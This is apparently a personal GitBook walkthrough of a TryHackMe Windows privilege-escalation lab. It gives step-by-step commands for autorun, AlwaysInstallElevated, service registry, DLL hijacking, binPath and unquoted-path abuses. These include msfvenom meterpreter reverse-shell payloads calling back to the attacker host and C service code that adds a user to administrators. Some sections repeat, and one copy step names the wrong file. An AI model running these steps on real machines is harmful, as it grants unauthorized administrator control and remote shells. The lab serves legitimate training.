> For the complete documentation index, see [llms.txt](https://jeffgthompsons-organization.gitbook.io/red-team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/windows-privesc-arena.md).

# Windows PrivEsc Arena

**Room Link:** <https://tryhackme.com/r/room/windowsprivescarena>

## Deploy the vulnerable machine

**Kali**

```
xfreerdp +clipboard /u:user /p:password321 /cert:ignore /v:$VICTIM /size:1024x568 /drive:kali,/root/
```

### Answer the questions

**Open a command prompt and run 'net user'. Who is the other non-default user on the machine?**

**Victim**

```
net users
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FBwya7muj3pNlz8pyly0N%2Fimage.png?alt=media&amp;token=539c1eec-da63-4ed4-a7b3-0ad1c5696a89" alt=""><figcaption></figcaption></figure>

## Registry Escalation - Autorun

### Detection

**Windows VM**

1\. Open command prompt and type: C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe

**Victim**

```
C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FZdWSYhgpu7v446ycCLtS%2Fimage.png?alt=media&amp;token=231d77c1-4322-4507-9286-0753df282b36" alt=""><figcaption></figcaption></figure>

\
2\. In Autoruns, click on the ‘Logon’ tab.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FgavazTm2WkwD0zp747gG%2Fimage.png?alt=media&amp;token=d8486c88-8fe1-45ca-94e0-8bd9e872b32b" alt=""><figcaption></figcaption></figure>

3\. From the listed results, notice that the “My Program” entry is pointing to “C:\Program Files\Autorun Program\program.exe”.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F99YTZM78fQF3AIyz7YOt%2Fimage.png?alt=media&amp;token=78078c8b-3840-40e6-be4e-d579148a84e4" alt=""><figcaption></figcaption></figure>

\
4\. In command prompt type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"

**Victim**

```
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
```

\
5\. From the output, notice that the “Everyone” user group has “FILE\_ALL\_ACCESS” permission on the “program.exe” file.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FNgcc6uX4YjgqTpECCLTb%2Fimage.png?alt=media&amp;token=35062cfe-27ac-4a85-b3d3-f497f39b3680" alt=""><figcaption></figcaption></figure>

### Exploitation

**Kali VM**

1\. Open command prompt and type: msfconsole

**Kali**

```
msfconsole
```

**Kali(msfconsole)**

```
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $KALI
run
```

\
6\. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse\_tcp lhost=\[Kali VM IP Address] -f exe -o program.exe

**Kali**

```
msfvenom -p windows/meterpreter/reverse_tcp lhost=$KALI -f exe -o program.exe
```

\
7\. Copy the generated file, program.exe, to the Windows VM.

**Kali**

```
ss -lptn 'sport = :139'
kill -9 $PID
sudo python3.9 /opt/impacket/build/scripts-3.9/smbserver.py kali .
```

**Windows VM**

1\. Place program.exe in ‘C:\Program Files\Autorun Program’.

**Victim**

```
copy \\$KALI\kali\reverse.exe C:\PrivEsc\reverse.exe
```

\
2\. To simulate the privilege escalation effect, logoff and then log back on as an administrator user.

**Victim**

```
xfreerdp +clipboard /u:TCM /p:Hacker123 /cert:ignore /v:$VICTIM /size:1024x568
```

**Kali VM**

1\. Wait for a new session to open in Metasploit.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FfwAEhsGkXV3mcqMaNw9f%2Fimage.png?alt=media&amp;token=bfca4c18-f1e8-4728-bea1-573920d2ef2a" alt=""><figcaption></figcaption></figure>

2\. In Metasploit (msf > prompt) type: sessions -i \[Session ID]

**Kali(msfconsole)**

<pre><code><strong>sessions -i 1
</strong></code></pre>

\
3\. To confirm that the attack succeeded, in Metasploit (msf > prompt) type: getuid

**Kali(meterpreter)**

```
getuid
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FlUiwTeeXXQyLLXnyrDHB%2Fimage.png?alt=media&amp;token=2dd92fec-7fec-4305-a1bc-cc98f7514959" alt=""><figcaption></figcaption></figure>

## Registry Escalation - Autorun

### Detection

**Windows VM**

1\. Open command prompt and type: C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe

**Victim**

```
C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
```

\
2\. In Autoruns, click on the ‘Logon’ tab.\
3\. From the listed results, notice that the “My Program” entry is pointing to “C:\Program Files\Autorun Program\program.exe”.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FBgpTqwZqdR93yiOsVCFo%2Fimage.png?alt=media&amp;token=5825334b-b04f-49a2-ab5d-399dd4f79ebd" alt=""><figcaption></figcaption></figure>

\
4\. In command prompt type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"

**Victim**

```
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
```

5\. From the output, notice that the “Everyone” user group has “FILE\_ALL\_ACCESS” permission on the “program.exe” file.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FGKHH08F2GmP6N4BKTpMn%2Fimage.png?alt=media&amp;token=58e6310e-c5a3-4358-a59c-0c9118599281" alt=""><figcaption></figcaption></figure>

### Exploitation

**Kali VM**

1\. Open command prompt and type: msfconsole

**Kali**

```
msfconsole
```

2\. In Metasploit (msf > prompt) type: use multi/handler\
3\. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse\_tcp\
4\. In Metasploit (msf > prompt) type: set lhost \[Kali VM IP Address]\
5\. In Metasploit (msf > prompt) type: run

**Kali(msfconsole)**

```
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost $KALI
run
```

\
6\. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse\_tcp lhost=\[Kali VM IP Address] -f exe -o program.exe

**Kali**

```
msfvenom -p windows/meterpreter/reverse_tcp lhost=$KALI -f exe -o program.exe
```

\
7\. Copy the generated file, program.exe, to the Windows VM.

**Kali**

```
ss -lptn 'sport = :139'
kill -9 $PID
sudo python3.9 /opt/impacket/build/scripts-3.9/smbserver.py kali .
```

**Victim**

```
copy \\$KALI\kali\program.exe "C:\Program Files\Autorun Program\program.exe"
```

**Windows VM**

1\. Place program.exe in ‘C:\Program Files\Autorun Program’.\
2\. To simulate the privilege escalation effect, logoff and then log back on as an administrator user.

**Kali**

```
xfreerdp +clipboard /u:TCM /p:Hacker123 /cert:ignore /v:$VICTIM /size:1024x568
```

**Kali VM**

1\. Wait for a new session to open in Metasploit.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FtH9EUH0KgkwxngJimTE5%2Fimage.png?alt=media&amp;token=d2805c3f-f681-472e-857b-6ccc871ea206" alt=""><figcaption></figcaption></figure>

2\. In Metasploit (msf > prompt) type: sessions -i \[Session ID]\
3\. To confirm that the attack succeeded, in Metasploit (msf > prompt) type: getuid

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FjkrJIxeDG5w6CdKgKCsI%2Fimage.png?alt=media&amp;token=5666cfa4-7f62-494e-a605-5c0b5ac11d64" alt=""><figcaption></figcaption></figure>

## Registry Escalation - AlwaysInstallElevated

### Detection

**Windows VM**

1.Open command prompt and type: reg query HKLM\Software\Policies\Microsoft\Windows\Installer

**Victim**

```
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FxCpWRSk1LzWHjXKLzWO4%2Fimage.png?alt=media&amp;token=8cbbdc53-5821-4554-ac7a-d60f70afbb02" alt=""><figcaption></figcaption></figure>

2.From the output, notice that “AlwaysInstallElevated” value is 1.\
3.In command prompt type: reg query HKCU\Software\Policies\Microsoft\Windows\Installer

**Victim**

```
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Fx6cFCiND2z7U6OXGK4i8%2Fimage.png?alt=media&amp;token=13def75c-6996-4a07-97f2-dc4714e50694" alt=""><figcaption></figcaption></figure>

4.From the output, notice that “AlwaysInstallElevated” value is 1.

### Exploitation

**Kali VM**

1\. Open command prompt and type: msfconsole

**Kali**

```
msfconsole
```

\
2\. In Metasploit (msf > prompt) type: use multi/handler\
3\. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse\_tcp\
4\. In Metasploit (msf > prompt) type: set lhost \[Kali VM IP Address]\
5\. In Metasploit (msf > prompt) type: run

**Kali (msfconsole)**

```
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost $KALI
run
```

\
6\. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse\_tcp lhost=\[Kali VM IP Address] -f msi -o setup.msi\
7\. Copy the generated file, setup.msi, to the Windows VM.<br>

**Kali**

```
msfvenom -p windows/meterpreter/reverse_tcp lhost=$KALI -f msi -o setup.msi
```

**Kali**

```
ss -lptn 'sport = :139'
kill -9 $PID
sudo python3.9 /opt/impacket/build/scripts-3.9/smbserver.py kali .
```

**Victim**

```
copy \\$KALI\kali\setup.msi "C:\Temp\setup.msi"
```

**Windows VM**

1.Place ‘setup.msi’ in ‘C:\Temp’.\
2.Open command prompt and type: msiexec /quiet /qn /i C:\Temp\setup.msi

**Victim**

```
msiexec /quiet /qn /i C:\Temp\setup.msi
```

**Kali VM**

1\. Wait for a new session to open in Metasploit.\
2\. In Metasploit (msf > prompt) type: sessions -i \[Session ID]\
3\. To confirm that the attack succeeded, in Metasploit (msf > prompt) type: getuid

**Kali (msfconsole)**

```
sessions -i 1
getuid
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FKkE3N42P5VDpqY9C8xXj%2Fimage.png?alt=media&amp;token=63807497-3e88-4547-8e2d-7209718ed2d8" alt=""><figcaption></figcaption></figure>

## Service Escalation - Registry

### ﻿Detection

**Windows VM**

1\. Open powershell prompt and type: Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl\
2\. Notice that the output suggests that user belong to “NT AUTHORITY\INTERACTIVE” has “FullContol” permission over the registry key.

**Victim(powershell)**

```
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FGnV5SM6ROmHTugYBqt3K%2Fimage.png?alt=media&amp;token=83ea4c2c-6e63-4586-98a6-5040b65c15f0" alt=""><figcaption></figcaption></figure>

### Exploitation

**Windows VM**

1\. Copy ‘C:\Users\User\Desktop\Tools\Source\windows\_service.c’ to the Kali VM.

**Kali**

```
xfreerdp +clipboard /u:user /p:password321 /cert:ignore /v:$VICTIM /size:1024x568  /drive:kali,/root/
```

**Victim**

```
copy "C:\Users\User\Desktop\Tools\Source\windows_service.c" \\tsclient\kali\windows_service.c
```

**Kali VM**

1\. Open windows\_service.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add

**windows\_service.c**

```
#include <windows.h>
#include <stdio.h>

#define SLEEP_TIME 5000

SERVICE_STATUS ServiceStatus; 
SERVICE_STATUS_HANDLE hStatus; 
 
void ServiceMain(int argc, char** argv); 
void ControlHandler(DWORD request); 

//add the payload here
int Run() 
{ 
    system("cmd.exe /k net localgroup administrators user /add");
    return 0; 
} 

int main() 
{ 
    SERVICE_TABLE_ENTRY ServiceTable[2];
    ServiceTable[0].lpServiceName = "MyService";
    ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;

    ServiceTable[1].lpServiceName = NULL;
    ServiceTable[1].lpServiceProc = NULL;
 
    StartServiceCtrlDispatcher(ServiceTable);  
    return 0;
}

void ServiceMain(int argc, char** argv) 
{ 
    ServiceStatus.dwServiceType        = SERVICE_WIN32; 
    ServiceStatus.dwCurrentState       = SERVICE_START_PENDING; 
    ServiceStatus.dwControlsAccepted   = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
    ServiceStatus.dwWin32ExitCode      = 0; 
    ServiceStatus.dwServiceSpecificExitCode = 0; 
    ServiceStatus.dwCheckPoint         = 0; 
    ServiceStatus.dwWaitHint           = 0; 
 
    hStatus = RegisterServiceCtrlHandler("MyService", (LPHANDLER_FUNCTION)ControlHandler); 
    Run(); 
    
    ServiceStatus.dwCurrentState = SERVICE_RUNNING; 
    SetServiceStatus (hStatus, &ServiceStatus);
 
    while (ServiceStatus.dwCurrentState == SERVICE_RUNNING)
    {
		Sleep(SLEEP_TIME);
    }
    return; 
}

void ControlHandler(DWORD request) 
{ 
    switch(request) 
    { 
        case SERVICE_CONTROL_STOP: 
			ServiceStatus.dwWin32ExitCode = 0; 
            ServiceStatus.dwCurrentState  = SERVICE_STOPPED; 
            SetServiceStatus (hStatus, &ServiceStatus);
            return; 
 
        case SERVICE_CONTROL_SHUTDOWN: 
            ServiceStatus.dwWin32ExitCode = 0; 
            ServiceStatus.dwCurrentState  = SERVICE_STOPPED; 
            SetServiceStatus (hStatus, &ServiceStatus);
            return; 
        
        default:
            break;
    } 
    SetServiceStatus (hStatus,  &ServiceStatus);
    return; 
} 
```

**Kali**

```
subl windows_service.c
```

**From**

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FW1e7e5sgTzAWijPjPpwq%2Fimage.png?alt=media&amp;token=33040588-65f4-40db-84f2-5175588e79c7" alt=""><figcaption></figcaption></figure>

**To**

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F7U7DJ9mUTnBTTKy3DnL8%2Fimage.png?alt=media&amp;token=045f3010-439e-48c5-95a7-3430c2495915" alt=""><figcaption></figcaption></figure>

\
2\. Exit the text editor and compile the file by typing the following in the command prompt: x86\_64-w64-mingw32-gcc windows\_service.c -o x.exe (NOTE: if this is not installed, use 'sudo apt install gcc-mingw-w64')&#x20;

**Kali**

```
x86_64-w64-mingw32-gcc windows_service.c -o x.exe
```

\
3\. Copy the generated file x.exe, to the Windows VM.

**Victim**

```
copy \\tsclient\kali\x.exe "C:\Temp\x.exe" 
```

**Windows VM**

1\. Place x.exe in ‘C:\Temp’.\
2\. Open command prompt at type: reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG\_EXPAND\_SZ /d c:\temp\x.exe /f

**Victim**

```
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
```

\
3\. In the command prompt type: sc start regsvc

**Victim**

```
sc start regsvc
```

\
4\. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

**Victim**

```
net localgroup administrators 
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F8X3xZ2pEGQ9K45Qg1BRt%2Fimage.png?alt=media&amp;token=79f9cf79-e38c-4197-910a-c2e310ca88f5" alt=""><figcaption></figcaption></figure>

## Service Escalation - Executable Files

### Detection

**Windows VM**

1\. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"

**Victim**

```
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
```

\
2\. Notice that the “Everyone” user group has “FILE\_ALL\_ACCESS” permission on the filepermservice.exe file.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FHsBM8uZxKwJOvgYGK47u%2Fimage.png?alt=media&amp;token=8906f48e-ce1a-4f7b-86e1-8a51358931f0" alt=""><figcaption></figcaption></figure>

### Exploitation

**Windows VM**

1\. Open command prompt and type: copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"

**Victim**

<pre><code><strong>copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
</strong></code></pre>

2\. In command prompt type: sc start filepermsvc

**Victim**

```
sc start filepermsvc
```

\
3\. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

**Victim**

```
net localgroup administrators
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FkJeZEJCtmoZG3MduRudw%2Fimage.png?alt=media&amp;token=6228a767-90ed-4fe3-92de-07a089188d4b" alt=""><figcaption></figcaption></figure>

## Privilege Escalation - Startup Applications

### Detection<br>

**Windows VM**

1\. Open command prompt and type: icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

**Victim**

```
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
```

\
2\. From the output notice that the “BUILTIN\Users” group has full access ‘(F)’ to the directory.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FydNS9s8zjnO6hfef4pYD%2Fimage.png?alt=media&amp;token=5ad81451-8631-4e55-a311-8003978c0aff" alt=""><figcaption></figcaption></figure>

### Exploitation

**Kali VM**

1\. Open command prompt and type: msfconsole

**Kali**

```
msfconsole
```

\
2\. In Metasploit (msf > prompt) type: use multi/handler\
3\. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse\_tcp\
4\. In Metasploit (msf > prompt) type: set lhost \[Kali VM IP Address]\
5\. In Metasploit (msf > prompt) type: run

**Kali(msfconsole)**

```
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost $KALI
run
```

\
6\. Open another command prompt and type: msfvenom -p windows/meterpreter/reverse\_tcp LHOST=\[Kali VM IP Address] -f exe -o x.exe\
7\. Copy the generated file, x.exe, to the Windows VM.

Windows VM

1\. Place x.exe in “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”.\
2\. Logoff.

**Victim**

```
copy \\tsclient\kali\x.exe "C:\Temp\x.exe" 
copy /y c:\Temp\x.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
shutdown /l
```

\
3\. Login with the administrator account credentials.

**Kali**

```
xfreerdp +clipboard /u:TCM /p:Hacker123 /cert:ignore /v:$VICTIM /size:1024x568 /drive:kali,/root/
```

**Kali VM**

1\. Wait for a session to be created, it may take a few seconds.\
2\. In Meterpreter(meterpreter > prompt) type: getuid\
3\. From the output, notice the user is “User-PC\Admin”

**Kali(msfconsole)**

```
getuid
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Fm66SOfiDiKmdrDQp0UOP%2Fimage.png?alt=media&amp;token=4f11fd0b-d1f3-402a-87c2-f32dff3e9d66" alt=""><figcaption></figcaption></figure>

## Service Escalation - DLL Hijacking

### Detection

**Windows VM**

1\. Open the Tools folder that is located on the desktop and then go the Process Monitor folder.\
2\. In reality, executables would be copied from the victim’s host over to the attacker’s host for analysis during run time. Alternatively, the same software can be installed on the attacker’s host for analysis, in case they can obtain it. To simulate this, right click on Procmon.exe and select ‘Run as administrator’ from the menu.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Ffo1wEBoojVMNxgMkN7FV%2Fimage.png?alt=media&amp;token=f2eb8285-eaa7-48ea-a8fe-aef708177726" alt=""><figcaption></figcaption></figure>

3\. In procmon, select "filter".  From the left-most drop down menu, select ‘Process Name’.\
4\. In the input box on the same line type: dllhijackservice.exe

\
5\. Make sure the line reads “Process Name is dllhijackservice.exe then Include” and click on the ‘Add’ button, then ‘Apply’ and lastly on ‘OK’.<br>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FAhG2aVM5wVf1WyAy87ko%2Fimage.png?alt=media&amp;token=ce94bfe8-ffff-48b9-bed1-95617e6e80bf" alt=""><figcaption></figcaption></figure>

6\. Next, select from the left-most drop down menu ‘Result’.<br>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FzqbDWYDCTizWl2ZrNcQ1%2Fimage.png?alt=media&amp;token=47f5929e-f00b-457f-a3a7-8003a9a07b05" alt=""><figcaption></figcaption></figure>

7\. In the input box on the same line type: NAME NOT FOUND\
8\. Make sure the line reads “Result is NAME NOT FOUND then Include” and click on the ‘Add’ button, then ‘Apply’ and lastly on ‘OK’.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FMsY0xWOiUSkY3MRWgYPN%2Fimage.png?alt=media&amp;token=d329d5eb-e0a7-4980-8eb7-02d34b2c3272" alt=""><figcaption></figcaption></figure>

\
9\. Open command prompt and type: sc start dllsvc

**Victim**

```
sc start dllsvc
```

\
10\. Scroll to the bottom of the window. One of the highlighted results shows that the service tried to execute ‘C:\Temp\hijackme.dll’ yet it could not do that as the file was not found. Note that ‘C:\Temp’ is a writable location.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FTy1OkF8lAkB98IeTb1V6%2Fimage.png?alt=media&amp;token=59029880-e31d-43fd-8257-4cfab00bdee3" alt=""><figcaption></figcaption></figure>

### Exploitation

**Windows VM**

1\. Copy ‘C:\Users\User\Desktop\Tools\Source\windows\_dll.c’ to the Kali VM.

**Victim**

```
copy "C:\Users\User\Desktop\Tools\Source\windows_dll.c" \\tsclient\kali\ 
```

**Kali VM**

1\. Open windows\_dll.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add

**Kali**

```
subl windows_dll.c
```

**From**

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FclOWtQZ4QMCFpZjsW4QH%2Fimage.png?alt=media&amp;token=afdd9aa9-7d19-4f25-9841-39a2da9b2835" alt=""><figcaption></figcaption></figure>

**To**

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FcogzgwvIeUVtxXMdRhrD%2Fimage.png?alt=media&amp;token=f1ce8386-e453-4e67-8859-60497330be82" alt=""><figcaption></figcaption></figure>

2\. Exit the text editor and compile the file by typing the following in the command prompt: x86\_64-w64-mingw32-gcc windows\_dll.c -shared -o hijackme.dll<br>

**Kali**

```
x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
```

3\. Copy the generated file hijackme.dll, to the Windows VM.

**Victim**

```
copy \\tsclient\kali\hijackme.dll  "C:\Temp\hijackme.dll"
```

\
1\. Open command prompt and type: sc stop dllsvc & sc start dllsvc

**Victim**

```
sc stop dllsvc & sc start dllsvc
```

\
2\. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

**Victim**

```
net localgroup administrators
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F4bnHtlbO5pgTXxVJdhDM%2Fimage.png?alt=media&amp;token=239fc584-b027-4abd-8904-98794b380ee0" alt=""><figcaption></figcaption></figure>

## Service Escalation - binPath

### Detection<br>

**Windows VM**

1\. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc

**Victim**

```
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc
```

2\. Notice that the output suggests that the user “User-PC\User” has the “SERVICE\_CHANGE\_CONFIG” permission.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FFizNKtEAsDGboJ5Qcl2J%2Fimage.png?alt=media&amp;token=6e3253f3-da07-407a-b7a4-7b39cd10675d" alt=""><figcaption></figcaption></figure>

### Exploitation

**Windows VM**

1\. In command prompt type: sc config daclsvc binpath= "net localgroup administrators user /add"

**Victim**

```
sc config daclsvc binpath= "net localgroup administrators user /add"
```

\
2\. In command prompt type: sc start daclsvc

**Victim**

```
sc start daclsvc
```

\
3\. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

**Victim**

```
net localgroup administrators
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FaBTDtkLQOD3EEmCTpQNf%2Fimage.png?alt=media&amp;token=bcb5e940-2fa2-48ae-bcfc-e9aa4592f995" alt=""><figcaption></figcaption></figure>

## Service Escalation - Unquoted Service Paths

### Detection<br>

**Windows VM**

1\. Open command prompt and type: sc qc unquotedsvc

**Victim**

```
sc qc unquotedsvc
```

2\. Notice that the “BINARY\_PATH\_NAME” field displays a path that is not confined between quotes.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FynGZJhikp5DdIlsp4TIz%2Fimage.png?alt=media&amp;token=b74506a7-86e2-4ebc-80df-73d78eb137f9" alt=""><figcaption></figcaption></figure>

### Exploitation

**Kali VM**

1\. Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe

**Kali**

```
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
```

2\. Copy the generated file, common.exe, to the Windows VM.

**Victim**

```
copy \\tsclient\kali\common.exe  "C:\Program Files\Unquoted Path Service\common.exe"
```

**Windows VM**

1\. Place common.exe in ‘C:\Program Files\Unquoted Path Service’.\
2\. Open command prompt and type: sc start unquotedsvc

**Victim**

```
sc start unquotedsvc
```

3\. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

**Victim**

```
net localgroup administrators
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FUIVAU4ZnfAOLV5USaRQe%2Fimage.png?alt=media&amp;token=791defef-f45a-4b59-b9f6-b61552d5f8fb" alt=""><figcaption></figcaption></figure>

## Service Escalation - Unquoted Service Paths

### Detection

1\. Open command prompt and type: sc qc unquotedsvc

**Victim**

```
sc qc unquotedsvc
```

\
2\. Notice that the “BINARY\_PATH\_NAME” field displays a path that is not confined between quotes.

### Exploitation

1\. Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe

**Kali**

```
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
```

\
2\. Copy the generated file, common.exe, to the Windows VM.

**Victim**

```
copy \\tsclient\kali\common.exe  "C:\Program Files\Unquoted Path Service\common.exe"
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FPbCa8y6IDrFsCqnKxAov%2Fimage.png?alt=media&amp;token=fa8ed306-9780-4471-ab7f-9c16ba345d16" alt=""><figcaption></figcaption></figure>

Windows VM

1\. Place common.exe in ‘C:\Program Files\Unquoted Path Service’.\
2\. Open command prompt and type: sc start unquotedsvc

**Victim**

```
sc start unquotedsvc
```

\
